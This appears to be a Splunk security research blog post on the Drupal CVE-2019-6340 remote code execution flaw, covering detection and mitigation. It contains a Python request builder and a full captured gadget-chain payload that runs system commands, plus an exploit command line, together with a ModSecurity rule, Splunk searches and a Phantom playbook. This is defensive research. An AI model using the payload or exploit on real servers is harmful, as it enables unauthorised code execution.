Every time a new vulnerability or exploit appears in the wild, it presents a complex puzzle for security professionals to solve. It's up to security researchers to lead the effort through the proof-of-concept (PoC), replication, detection, and mitigation phases. Their mission is simple: to help companies and individuals protect themselves against newly released exploit code.
To that end, let's explore the lifecycle and exploit code of a newly revealed vulnerability in Drupal, the popular content-management framework. The vulnerability, tracked as CVE-2019-6340, affects Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. It allows attackers to execute code on the target without prior authentication by sending crafted data to a non-form destination (REST/web services).
Drupal rivals WordPress in popularity, powering an estimated two percent or more of all websites on the Internet. As mentioned above, there are specific versions of Drupal affected by this vulnerability and explicit conditions that apply: “The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7.” *
The exploit code is found in public repositories. It requires little skill to execute, making it a serious threat to exposed Drupal servers.
Payload code: *
The exploit first checks for a content node (/node/{id}) with _format=hal_json via a GET request. Next, it sends a payload (Guzzle gadgets), an exploitation technique that targets the PHP unserialize() function: if untrusted data is passed to unserialize(), it can result in code execution. A very detailed exploitation walkthrough can be found here.
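Based on the request captured from our lab (shown in full below), the attack request can be sketched in Python roughly as follows. The function and variable names are illustrative, not taken from the actual PoC:

```python
import json

# Illustrative sketch (not the actual PoC): assemble the request that
# targets a content node with _format=hal_json and carries a serialized
# Guzzle gadget chain in the "options" field.
def build_exploit_request(target: str, node_id: int, gadget: str):
    """Return the URL, headers, and HAL+JSON body for the attack request."""
    url = f"{target}/node/{node_id}?_format=hal_json"
    headers = {"Content-Type": "application/hal+json"}
    body = {
        # "options" is the value that ultimately reaches unserialize()
        "link": [{"value": "link", "options": gadget}],
        "_links": {"type": {"href": f"{target}/rest/type/shortcut/default"}},
    }
    return url, headers, json.dumps(body)

url, headers, body = build_exploit_request(
    "http://192.168.86.76", 3, 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{...}'
)
print(url)  # http://192.168.86.76/node/3?_format=hal_json
```

The serialized gadget string here is truncated; the full chain appears in the captured payload below.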
Exploit proof of concept against lab target
Once the exploit was validated, the race was on to create detection and mitigation mechanisms. In this case, since it was a web exploit, we pursued building a ModSecurity (ModSec) WAF rule as the detection and defense mechanism to mitigate the threat. The process we followed to produce a ModSec rule appears below:
Using the POC exploit, we captured a pcap of the exploit flow and extracted an example payload using the following tcpdump string:
tcpdump -r CVE-2019-6340.pcap -nn -s0 -A | egrep -e 'GET /node/\d' -A12 -B12
We captured the following example payload, which we used to start building a ModSec rule:
GET /node/3?_format=hal_json HTTP/1.1
Host: 192.168.86.76
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/hal+json
Content-Length: 583
20:18:28.762332 IP 192.168.86.77.37584 > 192.168.86.76.80: Flags [P.], seq 225:808, ack 1, win 229, options [nop,nop,TS val 615012830 ecr 1128184318], length 583: HTTP
E..{ev@.@.....VM..VL...PO.. ..rB....N>.....
$.Y.C>..{"link": [{"value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:18:\"echo ---- & whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"}], "_links": {"type": {"href": "http://192.168.86.76/rest/type/shortcut/default"}}}
For the payload above, we decided to create a rule that matches on URLs of the form /node/{id}?_format=hal_json and on request bodies containing GuzzleHttp\\HandlerStack, both of which are key components of exploiting this vulnerability.
Our first rule draft looked like the following:
We can deconstruct it into the following pieces:
1. Configure the SecRule to operate on the REQUEST_URI field and do a regex match (@rx) on the incoming URLs:
   SecRule REQUEST_URI "@rx ^/node/\d+\?_format=hal_json"
2. Configure a rule id (id:932220), including what processing phase this rule will operate in (phase:2) and what action it should take (block, deny):
   "id:932220,\
3. Set the logging msg, specify the logdata it should include, and insert a handful of tags:
   msg:'CVE-2019-6340 Drupal Restful module RCE',\
   tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
   tag:'WASCTC/WASC-31',\
   tag:'OWASP_TOP_10/A1',\
   severity:'CRITICAL',\
4. Chain the first condition with a second SecRule condition that looks for GuzzleHttp\\HandlerStack in REQUEST_BODY, then set a handful of other variables:
   chain"
   setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
   setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
   setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{MATCHED_VAR_NAME}=%{tx.0}',\
   setvar:'tx.msg=%{rule.msg}'
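Putting the pieces together, the complete rule reads approximately as follows. This is a reconstruction from the fragments above; the phase/action ordering and the second operand's escaping are assumptions, so verify against your ModSec version before deploying:

```
SecRule REQUEST_URI "@rx ^/node/\d+\?_format=hal_json" \
    "id:932220,\
    phase:2,\
    block,\
    deny,\
    msg:'CVE-2019-6340 Drupal Restful module RCE',\
    tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\
    tag:'WASCTC/WASC-31',\
    tag:'OWASP_TOP_10/A1',\
    severity:'CRITICAL',\
    chain"
    SecRule REQUEST_BODY "@rx GuzzleHttp\\\\HandlerStack" \
        "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
        setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{MATCHED_VAR_NAME}=%{tx.0}',\
        setvar:'tx.msg=%{rule.msg}'"
```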
We wrote this rule under /etc/nginx/modsec/main.conf, reloaded NGINX, and proceeded to test it with a proof-of-concept exploit by running:
python3 46459.py http://127.0.0.1/ system id
To speed up our initial testing and bypass some of the checks, we modified the exploit a bit.
We configured it to launch the exploit regardless of whether Drupal Cache is enabled (which makes the attack unreliable), and to print the response from the server. This way, we can clearly verify whether NGINX+ModSec is sending us a 403 when the rule matches or, otherwise, returning a 200. Here is our modified version.
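The modified check can be sketched like this. This is an illustrative stand-in for our modified 46459.py, not the actual script; the function names and the bare GET probe are assumptions:

```python
import urllib.request
import urllib.error

# Illustrative sketch (not the actual modified 46459.py): probe the target
# unconditionally and interpret the status code as a WAF verdict.
def waf_verdict(status_code: int) -> str:
    """Interpret the HTTP status in terms of the ModSec rule."""
    if status_code == 403:
        return "blocked"   # NGINX+ModSec matched the rule
    if status_code == 200:
        return "passed"    # request reached Drupal unfiltered
    return "other"

def probe(target: str, node_id: int = 3) -> str:
    """Send the probe request and print the raw server response."""
    url = f"{target}/node/{node_id}?_format=hal_json"
    req = urllib.request.Request(
        url, headers={"Content-Type": "application/hal+json"}
    )
    try:
        with urllib.request.urlopen(req) as resp:
            print(resp.read().decode(errors="replace"))
            return waf_verdict(resp.status)
    except urllib.error.HTTPError as e:
        # A 403 from the WAF arrives here as an HTTPError
        print(e.read().decode(errors="replace"))
        return waf_verdict(e.code)
```

Running `probe("http://127.0.0.1")` against the lab target then prints the response body and reports whether the rule fired.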
After confirming the rule was successfully detecting the attack, we created a pull request to include it in the OWASP ModSecurity Core Rule Set (CRS).
Because Drupal is used so extensively, and because the exploit can turn compromised servers into botnet zombies for use in further attacks (such as DDoS, ransomware, cryptomining, and so on), this exploit could wreak havoc on a global scale. So, it's critical to cover all of our bases.
The following explains how we set up Splunk to detect this threat and demonstrates the process we followed in creating our input configuration. Specifically, we target two log sources: events from the ModSec WAF logs, and network data captured with the Splunk Stream app. Both sources require a universal forwarder configuration on the web/proxy server processing traffic for the targeted application.
1. Add inputs after installing forwarder
This created a props.conf file, as well. The objective of this file is to streamline source log parsing and speed up the indexing as we ingest data from the universal forwarder. In this case, the JSON format was specified.
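The inputs we added look roughly like this. The monitored path, index, and sourcetype names here are illustrative, not necessarily the ones we used:

```
# inputs.conf on the universal forwarder (illustrative values)
[monitor:///var/log/modsec_audit.log]
sourcetype = modsecurity
index = modsec
disabled = false
```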
2. Create props.conf to parse timestamp
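A minimal props.conf along these lines handles the JSON parsing and timestamp extraction. The sourcetype stanza and the time-prefix regex are assumptions based on the ModSec JSON audit log format:

```
# props.conf (illustrative values)
[modsecurity]
INDEXED_EXTRACTIONS = json
KV_MODE = none
TIME_PREFIX = "time_stamp"\s*:\s*"
MAX_TIMESTAMP_LOOKAHEAD = 32
TZ = UTC
```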
Once the above two configuration files were in place, we confirmed the log ingestion and indexing.
You can look at this process through the lens of an analyst's incident workflow: detection, investigation, and response.
As seen below, the search parameters return the parsed logs from ModSec. The exploit payload content can be seen under the “match” field. We can now search for and detect this attack using Splunk core.
3. See raw logs in search head
Once this data is indexed, the analyst can perform multiple investigative actions, such as a timeline analysis of attack requests, a comparison between monitored hosts, or attack-related actions (pre- and post-exploitation). The analyst can subsequently set up alerts based on attack data.
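As an example, a Splunk core search over the indexed ModSec events along these lines surfaces attacking hosts. The index name and the request-URI field are illustrative and depend on your ingest configuration; the ruleId and client_ip fields match those used in the alert search later in this post:

```
index=modsec "transaction.messages{}.details.ruleId"=932220
| stats count BY transaction.client_ip, transaction.request.uri
| sort - count
```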
Splunk lets you look at the different layers of network traffic using the Splunk Stream app, which you can use to look for patterns while detecting attack data. So, we installed Splunk Stream on the server hosting the targeted application. Next, we verified the ingestion of data in the form of HTTP requests, as seen below.
Splunk Stream App - HTTP Overview
We also tested the ingestion stream by triggering the attack and comparing the HTTP requests' status codes, specifically HTTP status 403 (Forbidden), which is returned when the rule matches.
1. Configure stream to collect additional fields (specifically src_content)
Additionally, since we were looking at the content payload (Guzzle gadgets), we decided to configure the Splunk Stream app to capture that content by creating a new Metadata Stream for HTTP data and enabling the additional src_content field, as in the image below. This is a required step that allows us to search for HTTP content captured in wire data.
Splunk Stream Configuration
Once the new field was enabled for ingestion, we were able to clearly identify the attack payload, as seen below.
2. Search for the payload in src_content
Now that we are able to ingest and index the exploit content payload, we can use a simple generic search to detect this attack, as seen below.
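A search of the following shape is enough. The index name is illustrative; the sourcetype and src_content field come from the Stream configuration above:

```
index=main sourcetype=stream:http src_content="*GuzzleHttp*HandlerStack*"
| table _time, src_ip, dest_ip, uri_path, status
```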
We can go beyond mere detection with Splunk Phantom, an automation tool that allows security operators to perform sequences of mitigation actions based on the results of their detection searches. In the following example, we sent an alert to a Phantom instance via Splunk, and then built a playbook that automates blocklisting of attacking IPs; if the attacking IP belongs to an AWS instance, the instance is quarantined.
Example of Splunk search and alert to Phantom instance
index="INDEX.NAME" transaction "transaction.messages{}.details.ruleId"=932220 | eval transaction.client_ip="offending.IP" | table transaction.host_ip, transaction.host_port, transaction.client_ip, transaction.messages{}.message | head 1 | sendalert sendtophantom param.phantom_server="automation (https://phantom.instance)" param.sensitivity="amber" param.severity="high" param.label="events"
Following the alert receipt, Splunk Phantom can automate an actions workflow, as seen below.
Splunk Phantom Playbook
The following items are the components of the above Phantom playbook:
Depending on the situation, you could initiate multiple actions. The following is an example of the actions available in one of the highlighted applications in the workflow we have described. This AWS Phantom app can perform multiple actions, including blacklisting, quarantining, disabling access, removing access, etc.
Splunk Phantom AWS Playbook
General mitigations for this vulnerability/attack:
- Upgrade to Drupal 8.6.10 or 8.5.11.
- If you cannot upgrade immediately, disable all web services modules, or configure the web server to reject PUT/PATCH/POST requests to web services resources.
- Deploy a WAF rule, such as the ModSec rule above, to detect and block exploitation attempts.
Download the bits on GitHub, and get the Splunk Enterprise Security Content Updates (ESCU) app in Splunkbase.
The Splunk Security Research Team is devoted to delivering actionable intelligence to Splunk customers, in an unceasing effort to safeguard them against modern enterprise risks. Composed of elite researchers, engineers, and consultants who have served in both public- and private-sector organizations, this innovative team of digital defenders monitors emerging cybercrime trends and techniques, then translates them into practical analytics that Splunk users can operationalize within their environments. Download the Splunk Enterprise Security Content Updates app to learn more.